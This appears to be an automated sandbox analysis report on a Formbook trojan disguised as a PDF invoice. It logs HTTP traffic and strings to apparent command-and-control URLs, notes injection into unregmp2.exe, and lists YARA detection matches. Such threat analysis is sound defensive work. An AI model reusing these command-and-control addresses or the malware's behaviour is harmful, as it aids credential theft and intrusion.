            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 06:53:41 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 06:53:43 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 06:53:46 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 06:53:48 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 39e_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://mocar.pro/wp-json/>; rel="https://api.w.org/"x-et-api-version: v1x-et-api-root: https://mocar.pro/wp-json/tribe/tickets/v1/x-et-api-origin: https://mocar.prox-tec-api-version: v1x-tec-api-root: https://mocar.pro/wp-json/tribe/events/v1/x-tec-api-origin: https://mocar.prox-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Wed, 03 Jul 2024 06:55:02 GMTserver: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 39e_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://mocar.pro/wp-json/>; rel="https://api.w.org/"x-et-api-version: v1x-et-api-root: https://mocar.pro/wp-json/tribe/tickets/v1/x-et-api-origin: https://mocar.prox-tec-api-version: v1x-tec-api-root: https://mocar.pro/wp-json/tribe/events/v1/x-tec-api-origin: https://mocar.prox-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Wed, 03 Jul 2024 06:55:04 GMTserver: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:55:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:55:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:55:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:55:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:56:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=wq93zh6QjYHzH9DTIIA6l77pbfuhMjdj_Wia_iHEJB0-1719989794146-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnlyServer: cloudflareCF-RAY: 89d4f9f3bacf1871-EWRContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:56:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=9nefUG9JgfK8Jvaa6cx.jYVHOqwB4jkc9O3wfoY8OYQ-1719989796691-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnlyServer: cloudflareCF-RAY: 89d4fa03a8a01871-EWRContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:56:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=Cw9MB1XKSws5DhwZsI061vsdZkGfcndq5IStvW62SM0-1719989799693-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnlyServer: cloudflareCF-RAY: 89d4fa1538f0c431-EWRContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:56:50 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 06:56:56 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006424000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003A04000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://mocar.pro/prg5/?hH=OUWlBSduFOmbWHHx1
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1327157394.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006F22000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004502000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://stefanogaus.com/0rsk/?hH=VoD
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.Thesprinklesontop.com
            Source: owYCvHvzfwuh.exe, 0000000D.00000002.3781878826.0000000004E2A000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.dxgsf.shop
            Source: owYCvHvzfwuh.exe, 0000000D.00000002.3781878826.0000000004E2A000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.dxgsf.shop/vfca/
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.thesprinklesontop.com/Easy_Ice_Cream_Recipes.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%2FJW
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.thesprinklesontop.com/Ninja_Ice_Cream_Recipes.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%2FJ
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.thesprinklesontop.com/Nutella_Ice_Cream_Recipe.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%2F
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.thesprinklesontop.com/Quick_Chocolate_Ice_Cream_Recipe.cfm?fp=M%2BtyRdDSGaZA523flChCSac4t
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.thesprinklesontop.com/Recipe_for_Fried_Ice_Cream.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.thesprinklesontop.com/__media__/design/underconstructionnotice.php?d=thesprinklesontop.co
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.thesprinklesontop.com/__media__/js/trademark.php?d=thesprinklesontop.com&type=ns
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdn.consentmanager.net
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://delivery.consentmanager.net
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://hm.baidu.com/hm.js?
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: unregmp2.exe, 00000009.00000002.3778117405.0000000003078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: unregmp2.exe, 00000009.00000002.3778117405.0000000003078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: unregmp2.exe, 00000009.00000003.1722342341.0000000007F17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: unregmp2.exe, 00000009.00000002.3778117405.0000000003078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: unregmp2.exe, 00000009.00000002.3778117405.000000000305B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: unregmp2.exe, 00000009.00000002.3778117405.0000000003078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: unregmp2.exe, 00000009.00000002.3778117405.000000000305B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://track.uc.cn/collect
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: unregmp2.exe, 00000009.00000002.3780666012.0000000005DDC000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.00000000033BC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.ennerdaledevcons.co.uk/4ksh/?hH=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK
            Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            Source: Yara match | File source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
